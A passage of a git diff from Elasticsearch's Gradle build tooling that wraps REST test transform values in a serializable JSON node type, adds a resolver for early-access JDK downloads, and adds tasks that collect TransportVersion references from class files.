JsonNode.class), testName)); + getTransformations().add(new AddMatch(subKey, SerializableJsonNode.of(value, JsonNode.class), testName)); } /** diff --git a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/test/rest/transform/ReplaceByKey.java b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/test/rest/transform/ReplaceByKey.java index 17d50a1a95db1..3cf542b12398b 100644 --- a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/test/rest/transform/ReplaceByKey.java +++ b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/test/rest/transform/ReplaceByKey.java @@ -10,6 +10,7 @@ package org.elasticsearch.gradle.internal.test.rest.transform; import com.fasterxml.jackson.databind.JsonNode; +import com.fasterxml.jackson.databind.node.ObjectNode; import org.gradle.api.tasks.Input; import org.gradle.api.tasks.Optional; @@ -25,18 +26,23 @@ public abstract class ReplaceByKey implements RestTestTransformByParentObject { private final String requiredChildKey; private final String newChildKey; - private final JsonNode replacementNode; + private final SerializableJsonNode replacementNode; private final String testName; - public ReplaceByKey(String requiredChildKey, JsonNode replacementNode) { + public ReplaceByKey(String requiredChildKey, SerializableJsonNode replacementNode) { this(requiredChildKey, replacementNode, null); } - public ReplaceByKey(String requiredChildKey, JsonNode replacementNode, String testName) { + public ReplaceByKey(String requiredChildKey, SerializableJsonNode replacementNode, String testName) { this(requiredChildKey, requiredChildKey, replacementNode, testName); } - public ReplaceByKey(String requiredChildKey, String newChildKey, JsonNode replacementNode, String testName) { + public ReplaceByKey( + String requiredChildKey, + String newChildKey, + SerializableJsonNode replacementNode, + String testName + ) { this.requiredChildKey = requiredChildKey; this.newChildKey = newChildKey; this.replacementNode = replacementNode; @@ -60,7 +66,7 @@ public boolean shouldApply(RestTestContext testContext) { @Input @Optional - public JsonNode getReplacementNode() { + public SerializableJsonNode getReplacementNode() { return replacementNode; } @@ -69,4 +75,10 @@ public JsonNode getReplacementNode() { public String getTestName() { return testName; } + + protected void updateReplacement(ObjectNode matchNode) { + matchNode.remove(requiredChildKey()); + matchNode.set(getNewChildKey(), replacementNode.toJsonNode()); + } + } diff --git a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/test/rest/transform/SerializableJsonNode.java b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/test/rest/transform/SerializableJsonNode.java new file mode 100644 index 0000000000000..1078084daea0a --- /dev/null +++ b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/test/rest/transform/SerializableJsonNode.java @@ -0,0 +1,44 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the "Elastic License + * 2.0", the "GNU Affero General Public License v3.0 only", and the "Server Side + * Public License v 1"; you may not use this file except in compliance with, at + * your election, the "Elastic License 2.0", the "GNU Affero General Public + * License v3.0 only", or the "Server Side Public License, v 1". + */ + +package org.elasticsearch.gradle.internal.test.rest.transform; + +import com.fasterxml.jackson.databind.JsonNode; +import com.fasterxml.jackson.databind.ObjectMapper; +import com.fasterxml.jackson.dataformat.yaml.YAMLFactory; + +import java.io.Serializable; + +/** + * A serializable wrapper for a JsonNode that can be used as Gradle task inputs. + * This is necessary because JsonNode serialization is not supported by Gradle configuration cache + * as it relies on DataInput.readFully which is unsupported by Gradle. + * + * @param The type of JsonNode this wrapper will hold. + */ +public class SerializableJsonNode implements Serializable { + + private Object value; + private Class type; + + SerializableJsonNode(Object value, Class type) { + this.value = value; + this.type = type; + } + + public static SerializableJsonNode of(Object value, Class type) { + return new SerializableJsonNode(value, type); + } + + public T toJsonNode() { + YAMLFactory YAML_FACTORY = new YAMLFactory(); + ObjectMapper MAPPER = new ObjectMapper(YAML_FACTORY); + return (T) MAPPER.convertValue(value, type); + } +} diff --git a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/test/rest/transform/close_to/ReplaceValueInCloseTo.java b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/test/rest/transform/close_to/ReplaceValueInCloseTo.java index 96561c3cf5444..0c3ac908fe224 100644 --- a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/test/rest/transform/close_to/ReplaceValueInCloseTo.java +++ b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/test/rest/transform/close_to/ReplaceValueInCloseTo.java @@ -13,6 +13,7 @@ import com.fasterxml.jackson.databind.node.ObjectNode; import org.elasticsearch.gradle.internal.test.rest.transform.ReplaceByKey; +import org.elasticsearch.gradle.internal.test.rest.transform.SerializableJsonNode; import org.gradle.api.tasks.Internal; /** @@ -22,11 +23,11 @@ */ public class ReplaceValueInCloseTo extends ReplaceByKey { - public ReplaceValueInCloseTo(String replaceKey, NumericNode replacementNode) { + public ReplaceValueInCloseTo(String replaceKey, SerializableJsonNode replacementNode) { this(replaceKey, replacementNode, null); } - public ReplaceValueInCloseTo(String replaceKey, NumericNode replacementNode, String testName) { + public ReplaceValueInCloseTo(String replaceKey, SerializableJsonNode replacementNode, String testName) { super(replaceKey, replaceKey, replacementNode, testName); } @@ -41,6 +42,7 @@ public void transformTest(ObjectNode matchParent) { ObjectNode closeToNode = (ObjectNode) matchParent.get(getKeyToFind()); ObjectNode subNode = (ObjectNode) closeToNode.get(requiredChildKey()); subNode.remove("value"); - subNode.set("value", getReplacementNode()); + subNode.set("value", getReplacementNode().toJsonNode()); } + } diff --git a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/test/rest/transform/length/ReplaceValueInLength.java b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/test/rest/transform/length/ReplaceValueInLength.java index 936deea70703d..50a6493049bcf 100644 --- a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/test/rest/transform/length/ReplaceValueInLength.java +++ b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/test/rest/transform/length/ReplaceValueInLength.java @@ -9,10 +9,10 @@ package org.elasticsearch.gradle.internal.test.rest.transform.length; -import com.fasterxml.jackson.databind.node.NumericNode; import com.fasterxml.jackson.databind.node.ObjectNode; import org.elasticsearch.gradle.internal.test.rest.transform.ReplaceByKey; +import org.elasticsearch.gradle.internal.test.rest.transform.SerializableJsonNode; import org.gradle.api.tasks.Internal; /** @@ -21,11 +21,11 @@ */ public class ReplaceValueInLength extends ReplaceByKey { - public ReplaceValueInLength(String replaceKey, NumericNode replacementNode) { + public ReplaceValueInLength(String replaceKey, SerializableJsonNode replacementNode) { this(replaceKey, replacementNode, null); } - public ReplaceValueInLength(String replaceKey, NumericNode replacementNode, String testName) { + public ReplaceValueInLength(String replaceKey, SerializableJsonNode replacementNode, String testName) { super(replaceKey, replaceKey, replacementNode, testName); } @@ -38,7 +38,7 @@ public String getKeyToFind() { @Override public void transformTest(ObjectNode matchParent) { ObjectNode matchNode = (ObjectNode) matchParent.get(getKeyToFind()); - matchNode.remove(requiredChildKey()); - matchNode.set(getNewChildKey(), getReplacementNode()); + updateReplacement(matchNode); } + } diff --git a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/test/rest/transform/match/AddMatch.java b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/test/rest/transform/match/AddMatch.java index ff8ec820d60c4..f5f7a7f55ce03 100644 --- a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/test/rest/transform/match/AddMatch.java +++ b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/test/rest/transform/match/AddMatch.java @@ -16,6 +16,7 @@ import org.elasticsearch.gradle.internal.test.rest.transform.RestTestContext; import org.elasticsearch.gradle.internal.test.rest.transform.RestTestTransformByParentArray; +import org.elasticsearch.gradle.internal.test.rest.transform.SerializableJsonNode; import org.gradle.api.tasks.Input; import org.gradle.api.tasks.Internal; @@ -28,9 +29,9 @@ public class AddMatch implements RestTestTransformByParentArray { private static JsonNodeFactory jsonNodeFactory = JsonNodeFactory.withExactBigDecimals(false); private final String matchKey; private final String testName; - private final JsonNode matchValue; + private final SerializableJsonNode matchValue; - public AddMatch(String matchKey, JsonNode matchValue, String testName) { + public AddMatch(String matchKey, SerializableJsonNode matchValue, String testName) { this.matchKey = matchKey; this.matchValue = matchValue; this.testName = Objects.requireNonNull(testName, "adding matches is only supported for named tests"); @@ -45,7 +46,7 @@ public boolean shouldApply(RestTestContext testContext) { public void transformTest(ArrayNode matchParent) { ObjectNode matchObject = new ObjectNode(jsonNodeFactory); ObjectNode matchContent = new ObjectNode(jsonNodeFactory); - matchContent.set(matchKey, matchValue); + matchContent.set(matchKey, matchValue.toJsonNode()); matchObject.set("match", matchContent); matchParent.add(matchObject); } @@ -70,6 +71,6 @@ public String getTestName() { @Input public JsonNode getMatchValue() { - return matchValue; + return matchValue.toJsonNode(); } } diff --git a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/test/rest/transform/match/ReplaceValueInMatch.java b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/test/rest/transform/match/ReplaceValueInMatch.java index 5e46934c8ba4a..f52558dbd2f2e 100644 --- a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/test/rest/transform/match/ReplaceValueInMatch.java +++ b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/test/rest/transform/match/ReplaceValueInMatch.java @@ -13,6 +13,7 @@ import com.fasterxml.jackson.databind.node.ObjectNode; import org.elasticsearch.gradle.internal.test.rest.transform.ReplaceByKey; +import org.elasticsearch.gradle.internal.test.rest.transform.SerializableJsonNode; import org.gradle.api.tasks.Internal; /** @@ -20,11 +21,11 @@ */ public class ReplaceValueInMatch extends ReplaceByKey { - public ReplaceValueInMatch(String replaceKey, JsonNode replacementNode) { + public ReplaceValueInMatch(String replaceKey, SerializableJsonNode replacementNode) { this(replaceKey, replacementNode, null); } - public ReplaceValueInMatch(String replaceKey, JsonNode replacementNode, String testName) { + public ReplaceValueInMatch(String replaceKey, SerializableJsonNode replacementNode, String testName) { super(replaceKey, replaceKey, replacementNode, testName); } @@ -37,7 +38,6 @@ public String getKeyToFind() { @Override public void transformTest(ObjectNode matchParent) { ObjectNode matchNode = (ObjectNode) matchParent.get(getKeyToFind()); - matchNode.remove(requiredChildKey()); - matchNode.set(getNewChildKey(), getReplacementNode()); + updateReplacement(matchNode); } } diff --git a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/test/rest/transform/text/ReplaceIsFalse.java b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/test/rest/transform/text/ReplaceIsFalse.java index 53a35b09dd087..72e225918e187 100644 --- a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/test/rest/transform/text/ReplaceIsFalse.java +++ b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/test/rest/transform/text/ReplaceIsFalse.java @@ -11,12 +11,14 @@ import com.fasterxml.jackson.databind.node.TextNode; +import org.elasticsearch.gradle.internal.test.rest.transform.SerializableJsonNode; + public class ReplaceIsFalse extends ReplaceTextual { - public ReplaceIsFalse(String valueToBeReplaced, TextNode replacementNode) { + public ReplaceIsFalse(String valueToBeReplaced, SerializableJsonNode replacementNode) { super("is_false", valueToBeReplaced, replacementNode); } - public ReplaceIsFalse(String valueToBeReplaced, TextNode replacementNode, String testName) { + public ReplaceIsFalse(String valueToBeReplaced, SerializableJsonNode replacementNode, String testName) { super("is_false", valueToBeReplaced, replacementNode, testName); } } diff --git a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/test/rest/transform/text/ReplaceIsTrue.java b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/test/rest/transform/text/ReplaceIsTrue.java index 51db9c88774b7..c5bc8fb6e0d79 100644 --- a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/test/rest/transform/text/ReplaceIsTrue.java +++ b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/test/rest/transform/text/ReplaceIsTrue.java @@ -11,12 +11,14 @@ import com.fasterxml.jackson.databind.node.TextNode; +import org.elasticsearch.gradle.internal.test.rest.transform.SerializableJsonNode; + public class ReplaceIsTrue extends ReplaceTextual { - public ReplaceIsTrue(String valueToBeReplaced, TextNode replacementNode) { + public ReplaceIsTrue(String valueToBeReplaced, SerializableJsonNode replacementNode) { super("is_true", valueToBeReplaced, replacementNode); } - public ReplaceIsTrue(String valueToBeReplaced, TextNode replacementNode, String testName) { + public ReplaceIsTrue(String valueToBeReplaced, SerializableJsonNode replacementNode, String testName) { super("is_true", valueToBeReplaced, replacementNode, testName); } } diff --git a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/test/rest/transform/text/ReplaceTextual.java b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/test/rest/transform/text/ReplaceTextual.java index 6397e938f091c..ae9cc43dae2ed 100644 --- a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/test/rest/transform/text/ReplaceTextual.java +++ b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/test/rest/transform/text/ReplaceTextual.java @@ -15,6 +15,7 @@ import org.elasticsearch.gradle.internal.test.rest.transform.RestTestContext; import org.elasticsearch.gradle.internal.test.rest.transform.RestTestTransformByParentObject; +import org.elasticsearch.gradle.internal.test.rest.transform.SerializableJsonNode; import org.gradle.api.tasks.Input; import org.gradle.api.tasks.Internal; import org.gradle.api.tasks.Optional; @@ -25,17 +26,22 @@ public class ReplaceTextual implements RestTestTransformByParentObject { private final String keyToReplaceName; private final String valueToBeReplaced; - private final TextNode replacementNode; + private final SerializableJsonNode replacementNode; private final String testName; - public ReplaceTextual(String keyToReplaceName, String valueToBeReplaced, TextNode replacementNode) { + public ReplaceTextual(String keyToReplaceName, String valueToBeReplaced, SerializableJsonNode replacementNode) { this.keyToReplaceName = keyToReplaceName; this.valueToBeReplaced = valueToBeReplaced; this.replacementNode = replacementNode; this.testName = null; } - public ReplaceTextual(String keyToReplaceName, String valueToBeReplaced, TextNode replacementNode, String testName) { + public ReplaceTextual( + String keyToReplaceName, + String valueToBeReplaced, + SerializableJsonNode replacementNode, + String testName + ) { this.keyToReplaceName = keyToReplaceName; this.valueToBeReplaced = valueToBeReplaced; this.replacementNode = replacementNode; @@ -60,7 +66,7 @@ public boolean shouldApply(RestTestContext testContext) { @Override public void transformTest(ObjectNode matchParent) { - matchParent.set(getKeyToFind(), replacementNode); + matchParent.set(getKeyToFind(), replacementNode.toJsonNode()); } @Input @@ -69,7 +75,7 @@ public String getValueToBeReplaced() { } @Input - public JsonNode getReplacementNode() { + public SerializableJsonNode getReplacementNode() { return replacementNode; } diff --git a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/toolchain/EarlyAccessCatalogJdkToolchainResolver.java b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/toolchain/EarlyAccessCatalogJdkToolchainResolver.java new file mode 100644 index 0000000000000..e3063aeeff504 --- /dev/null +++ b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/toolchain/EarlyAccessCatalogJdkToolchainResolver.java @@ -0,0 +1,179 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the "Elastic License + * 2.0", the "GNU Affero General Public License v3.0 only", and the "Server Side + * Public License v 1"; you may not use this file except in compliance with, at + * your election, the "Elastic License 2.0", the "GNU Affero General Public + * License v3.0 only", or the "Server Side Public License, v 1". + */ + +package org.elasticsearch.gradle.internal.toolchain; + +import com.fasterxml.jackson.databind.JsonNode; +import com.fasterxml.jackson.databind.ObjectMapper; +import com.fasterxml.jackson.databind.node.ArrayNode; +import com.fasterxml.jackson.databind.node.ObjectNode; + +import org.elasticsearch.gradle.VersionProperties; +import org.gradle.jvm.toolchain.JavaLanguageVersion; +import org.gradle.jvm.toolchain.JavaToolchainDownload; +import org.gradle.jvm.toolchain.JavaToolchainRequest; +import org.gradle.jvm.toolchain.JavaToolchainSpec; +import org.gradle.platform.Architecture; +import org.gradle.platform.BuildPlatform; +import org.gradle.platform.OperatingSystem; + +import java.io.IOException; +import java.io.InputStream; +import java.net.MalformedURLException; +import java.net.URI; +import java.net.URL; +import java.util.ArrayList; +import java.util.Comparator; +import java.util.List; +import java.util.Optional; + +/** + * A toolchain resolver that resolves early access JDKs from the Elasticsearch JDK archive. + *

+ * This resolver can used to resolve JDKs that are not bundled with Elasticsearch but are available in the early access catalog. + * It supports resolving JDKs based on their language version and build number. + * + * Currently the gradle toolchain support does not support querying specific versions (e.g. 26-ea+6) so. For now + * this only supports resolving the latest early access build for a given language version. + *

+ */ +public abstract class EarlyAccessCatalogJdkToolchainResolver extends AbstractCustomJavaToolchainResolver { + + public static final String RECENT_JDK_RELEASES_CATALOG_URL = "https://builds.es-jdk-archive.com/jdks/openjdk/recent.json"; + + interface JdkBuild { + JavaLanguageVersion languageVersion(); + + String url(String os, String arch, String extension); + } + + @FunctionalInterface + interface EarlyAccessJdkBuildResolver { + PreReleaseJdkBuild findLatestEABuild(JavaLanguageVersion languageVersion); + } + + // allow overriding for testing + EarlyAccessJdkBuildResolver earlyAccessJdkBuildResolver = (languageVersion) -> findLatestPreReleaseBuild(languageVersion); + + public record PreReleaseJdkBuild(JavaLanguageVersion languageVersion, int buildNumber, String type) implements JdkBuild { + @Override + public String url(String os, String arch, String extension) { + // example: + // https://builds.es-jdk-archive.com/jdks/openjdk/26/openjdk-26-ea+6/openjdk-26-ea+6_linux-aarch64_bin.tar.gz + + // RCs don't attach a special suffix to the artifact name + String releaseTypeSuffix = type.equals("ea") ? "-" + type + "+" + buildNumber : ""; + return "https://builds.es-jdk-archive.com/jdks/openjdk/" + + languageVersion.asInt() + + "/" + + "openjdk-" + + languageVersion.asInt() + + "-" + + type + + "+" + + buildNumber + + "/" + + "openjdk-" + + languageVersion.asInt() + + releaseTypeSuffix + + "_" + + os + + "-" + + arch + + "_bin." + + extension; + } + } + + private static final List supportedOperatingSystems = List.of( + OperatingSystem.MAC_OS, + OperatingSystem.LINUX, + OperatingSystem.WINDOWS + ); + + /** + * We need some place to map JavaLanguageVersion to buildNumber, minor version etc. + * */ + @Override + public Optional resolve(JavaToolchainRequest request) { + if (Integer.parseInt(VersionProperties.getBundledJdkMajorVersion()) >= request.getJavaToolchainSpec() + .getLanguageVersion() + .get() + .asInt()) { + } + return findSupportedBuild(request).map(build -> { + OperatingSystem operatingSystem = request.getBuildPlatform().getOperatingSystem(); + String extension = operatingSystem.equals(OperatingSystem.WINDOWS) ? "zip" : "tar.gz"; + String arch = toArchString(request.getBuildPlatform().getArchitecture()); + String os = toOsString(operatingSystem); + return (JavaToolchainDownload) () -> URI.create(build.url(os, arch, extension)); + }); + } + + /** + * Check if request can be full-filled by this resolver: + * 1. Aarch64 windows images are not supported + */ + private Optional findSupportedBuild(JavaToolchainRequest request) { + JavaToolchainSpec javaToolchainSpec = request.getJavaToolchainSpec(); + BuildPlatform buildPlatform = request.getBuildPlatform(); + Architecture architecture = buildPlatform.getArchitecture(); + OperatingSystem operatingSystem = buildPlatform.getOperatingSystem(); + + if (supportedOperatingSystems.contains(operatingSystem) == false + || Architecture.AARCH64 == architecture && OperatingSystem.WINDOWS == operatingSystem) { + return Optional.empty(); + } + + JavaLanguageVersion languageVersion = javaToolchainSpec.getLanguageVersion().get(); + return Optional.of(earlyAccessJdkBuildResolver.findLatestEABuild(languageVersion)); + } + + static List findRecentPreReleaseBuild(JavaLanguageVersion languageVersion) { + try { + URL url = new URL(RECENT_JDK_RELEASES_CATALOG_URL); + try (InputStream is = url.openStream()) { + ObjectMapper mapper = new ObjectMapper(); + JsonNode node = mapper.readTree(is); + ObjectNode majors = (ObjectNode) node.get("majors"); + System.out.println(majors.getClass()); + ObjectNode perVersion = (ObjectNode) majors.get("" + languageVersion.asInt()); + ArrayNode buildsNode = (ArrayNode) perVersion.get("builds"); + List buildsList = new ArrayList<>(); + buildsNode.forEach(buildsList::add); + List eaBuilds = buildsList.stream() + .map( + n -> new PreReleaseJdkBuild( + JavaLanguageVersion.of(n.get("major").asText()), + Integer.parseInt(n.get("build").asText()), + n.get("type").asText() + ) + ) + .toList(); + return eaBuilds.stream().filter(ea -> ea.languageVersion().equals(languageVersion)).toList(); + } catch (IOException e) { + throw new RuntimeException(e); + } + } catch (MalformedURLException e) { + throw new RuntimeException(e); + } + } + + public static PreReleaseJdkBuild findPreReleaseBuild(JavaLanguageVersion languageVersion, int buildNumber) { + return findRecentPreReleaseBuild(languageVersion).stream() + .filter(preReleaseJdkBuild -> preReleaseJdkBuild.buildNumber == buildNumber) + .max(Comparator.comparingInt(PreReleaseJdkBuild::buildNumber)) + .get(); + } + + public static PreReleaseJdkBuild findLatestPreReleaseBuild(JavaLanguageVersion languageVersion) { + return findRecentPreReleaseBuild(languageVersion).stream().max(Comparator.comparingInt(PreReleaseJdkBuild::buildNumber)).get(); + } + +} diff --git a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/toolchain/JavaToolChainResolverPlugin.java b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/toolchain/JavaToolChainResolverPlugin.java index b89eb87325754..1cacbb38fdd5d 100644 --- a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/toolchain/JavaToolChainResolverPlugin.java +++ b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/toolchain/JavaToolChainResolverPlugin.java @@ -23,6 +23,7 @@ public void apply(Settings settings) { settings.getPlugins().apply("jvm-toolchain-management"); JavaToolchainResolverRegistry registry = getToolchainResolverRegistry(); registry.register(OracleOpenJdkToolchainResolver.class); + registry.register(EarlyAccessCatalogJdkToolchainResolver.class); registry.register(AdoptiumJdkToolchainResolver.class); registry.register(ArchivedOracleJdkToolchainResolver.class); } diff --git a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/toolchain/OracleOpenJdkToolchainResolver.java b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/toolchain/OracleOpenJdkToolchainResolver.java index 41a47ece90d5d..a0036529ad6fe 100644 --- a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/toolchain/OracleOpenJdkToolchainResolver.java +++ b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/toolchain/OracleOpenJdkToolchainResolver.java @@ -58,26 +58,6 @@ public String url(String os, String arch, String extension) { } } - record EarlyAccessJdkBuild(JavaLanguageVersion languageVersion, String buildNumber) implements JdkBuild { - @Override - public String url(String os, String arch, String extension) { - return "https://download.java.net/java/early_access/jdk" - + languageVersion.asInt() - + "/" - + buildNumber - + "/GPL/openjdk-" - + languageVersion.asInt() - + "-ea+" - + buildNumber - + "_" - + os - + "-" - + arch - + "_bin." - + extension; - } - } - private static final Pattern VERSION_PATTERN = Pattern.compile( "(\\d+)(\\.\\d+\\.\\d+(?:\\.\\d+)?)?\\+(\\d+(?:\\.\\d+)?)(@([a-f0-9]{32}))?" ); @@ -90,18 +70,9 @@ public String url(String os, String arch, String extension) { // package private so it can be replaced by tests List builds = List.of( - getBundledJdkBuild(VersionProperties.getBundledJdkVersion(), VersionProperties.getBundledJdkMajorVersion()), - getEarlyAccessBuild(JavaLanguageVersion.of(25), "3") + getBundledJdkBuild(VersionProperties.getBundledJdkVersion(), VersionProperties.getBundledJdkMajorVersion()) ); - static EarlyAccessJdkBuild getEarlyAccessBuild(JavaLanguageVersion languageVersion, String buildNumber) { - // first try the unversioned override, then the versioned override which has higher precedence - buildNumber = System.getProperty("runtime.java.build", buildNumber); - buildNumber = System.getProperty("runtime.java." + languageVersion.asInt() + ".build", buildNumber); - - return new EarlyAccessJdkBuild(languageVersion, buildNumber); - } - static JdkBuild getBundledJdkBuild(String bundledJdkVersion, String bundledJkdMajorVersionString) { JavaLanguageVersion bundledJdkMajorVersion = JavaLanguageVersion.of(bundledJkdMajorVersionString); Matcher jdkVersionMatcher = VERSION_PATTERN.matcher(bundledJdkVersion); diff --git a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/transport/CollectTransportVersionReferencesTask.java b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/transport/CollectTransportVersionReferencesTask.java new file mode 100644 index 0000000000000..d572abb848d1c --- /dev/null +++ b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/transport/CollectTransportVersionReferencesTask.java @@ -0,0 +1,132 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the "Elastic License + * 2.0", the "GNU Affero General Public License v3.0 only", and the "Server Side + * Public License v 1"; you may not use this file except in compliance with, at + * your election, the "Elastic License 2.0", the "GNU Affero General Public + * License v3.0 only", or the "Server Side Public License, v 1". + */ + +package org.elasticsearch.gradle.internal.transport; + +import org.gradle.api.DefaultTask; +import org.gradle.api.file.ConfigurableFileCollection; +import org.gradle.api.file.RegularFileProperty; +import org.gradle.api.tasks.CacheableTask; +import org.gradle.api.tasks.Classpath; +import org.gradle.api.tasks.OutputFile; +import org.gradle.api.tasks.TaskAction; +import org.objectweb.asm.ClassReader; +import org.objectweb.asm.ClassVisitor; +import org.objectweb.asm.Label; +import org.objectweb.asm.MethodVisitor; +import org.objectweb.asm.Opcodes; +import org.objectweb.asm.tree.LdcInsnNode; +import org.objectweb.asm.tree.MethodNode; + +import java.io.IOException; +import java.io.InputStream; +import java.nio.file.FileVisitResult; +import java.nio.file.Files; +import java.nio.file.Path; +import java.nio.file.SimpleFileVisitor; +import java.nio.file.attribute.BasicFileAttributes; +import java.util.HashSet; +import java.util.Set; + +/** + * This task locates all method invocations of org.elasticsearch.TransportVersion#fromName(java.lang.String) in the + * provided directory, and then records the value of string literals passed as arguments. It then records each + * string on a newline along with path and line number in the provided output file. + */ +@CacheableTask +public abstract class CollectTransportVersionReferencesTask extends DefaultTask { + public static final String TRANSPORT_VERSION_SET_CLASS = "org/elasticsearch/TransportVersion"; + public static final String TRANSPORT_VERSION_SET_METHOD_NAME = "fromName"; + public static final String CLASS_EXTENSION = ".class"; + public static final String MODULE_INFO = "module-info.class"; + + /** + * The directory to scan for method invocations. + */ + @Classpath + public abstract ConfigurableFileCollection getClassPath(); + + /** + * The output file, with each newline containing the string literal argument of each method + * invocation. + */ + @OutputFile + public abstract RegularFileProperty getOutputFile(); + + @TaskAction + public void checkTransportVersion() throws IOException { + var results = new HashSet(); + + for (var cpElement : getClassPath()) { + Path file = cpElement.toPath(); + if (Files.isDirectory(file)) { + addNamesFromClassesDirectory(results, file); + } + } + + Path outputFile = getOutputFile().get().getAsFile().toPath(); + Files.writeString(outputFile, String.join("\n", results.stream().map(Object::toString).sorted().toList())); + } + + private void addNamesFromClassesDirectory(Set results, Path basePath) throws IOException { + Files.walkFileTree(basePath, new SimpleFileVisitor<>() { + @Override + public FileVisitResult visitFile(Path file, BasicFileAttributes attrs) throws IOException { + String filename = file.getFileName().toString(); + if (filename.endsWith(CLASS_EXTENSION) && filename.endsWith(MODULE_INFO) == false) { + try (var inputStream = Files.newInputStream(file)) { + addNamesFromClass(results, inputStream, classname(basePath.relativize(file).toString())); + } + } + return FileVisitResult.CONTINUE; + } + }); + } + + private void addNamesFromClass(Set results, InputStream classBytes, String classname) throws IOException { + ClassVisitor classVisitor = new ClassVisitor(Opcodes.ASM9) { + @Override + public MethodVisitor visitMethod(int access, String name, String descriptor, String signature, String[] exceptions) { + return new MethodNode(Opcodes.ASM9, access, name, descriptor, signature, exceptions) { + int lineNumber = -1; + + @Override + public void visitLineNumber(int line, Label start) { + lineNumber = line; + } + + @Override + public void visitMethodInsn(int opcode, String owner, String name, String descriptor, boolean isInterface) { + if (owner.equals(TRANSPORT_VERSION_SET_CLASS) && name.equals(TRANSPORT_VERSION_SET_METHOD_NAME)) { + var abstractInstruction = this.instructions.getLast(); + String location = classname + " line " + lineNumber; + if (abstractInstruction instanceof LdcInsnNode ldcInsnNode + && ldcInsnNode.cst instanceof String tvName + && tvName.isEmpty() == false) { + results.add(new TransportVersionReference(tvName, location)); + } else { + // The instruction is not a LDC with a String constant (or an empty String), which is not allowed. + throw new RuntimeException( + "TransportVersion.fromName must be called with a non-empty String literal. " + "See " + location + "." + ); + } + } + super.visitMethodInsn(opcode, owner, name, descriptor, isInterface); + } + }; + } + }; + ClassReader classReader = new ClassReader(classBytes); + classReader.accept(classVisitor, 0); + } + + private static String classname(String filename) { + return filename.substring(0, filename.length() - CLASS_EXTENSION.length()).replaceAll("[/\\\\]", "."); + } +} diff --git a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/transport/GenerateTransportVersionManifestTask.java b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/transport/GenerateTransportVersionManifestTask.java new file mode 100644 index 0000000000000..f0a0ee09cd3a2 --- /dev/null +++ b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/transport/GenerateTransportVersionManifestTask.java @@ -0,0 +1,60 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the "Elastic License + * 2.0", the "GNU Affero General Public License v3.0 only", and the "Server Side + * Public License v 1"; you may not use this file except in compliance with, at + * your election, the "Elastic License 2.0", the "GNU Affero General Public + * License v3.0 only", or the "Server Side Public License, v 1". + */ + +package org.elasticsearch.gradle.internal.transport; + +import org.gradle.api.DefaultTask; +import org.gradle.api.file.RegularFileProperty; +import org.gradle.api.provider.Property; +import org.gradle.api.services.ServiceReference; +import org.gradle.api.tasks.InputDirectory; +import org.gradle.api.tasks.Optional; +import org.gradle.api.tasks.OutputFile; +import org.gradle.api.tasks.PathSensitive; +import org.gradle.api.tasks.PathSensitivity; +import org.gradle.api.tasks.TaskAction; + +import java.io.IOException; +import java.nio.file.FileVisitResult; +import java.nio.file.Files; +import java.nio.file.Path; +import java.nio.file.SimpleFileVisitor; +import java.nio.file.attribute.BasicFileAttributes; + +public abstract class GenerateTransportVersionManifestTask extends DefaultTask { + + @ServiceReference("transportVersionResources") + abstract Property getTransportResources(); + + 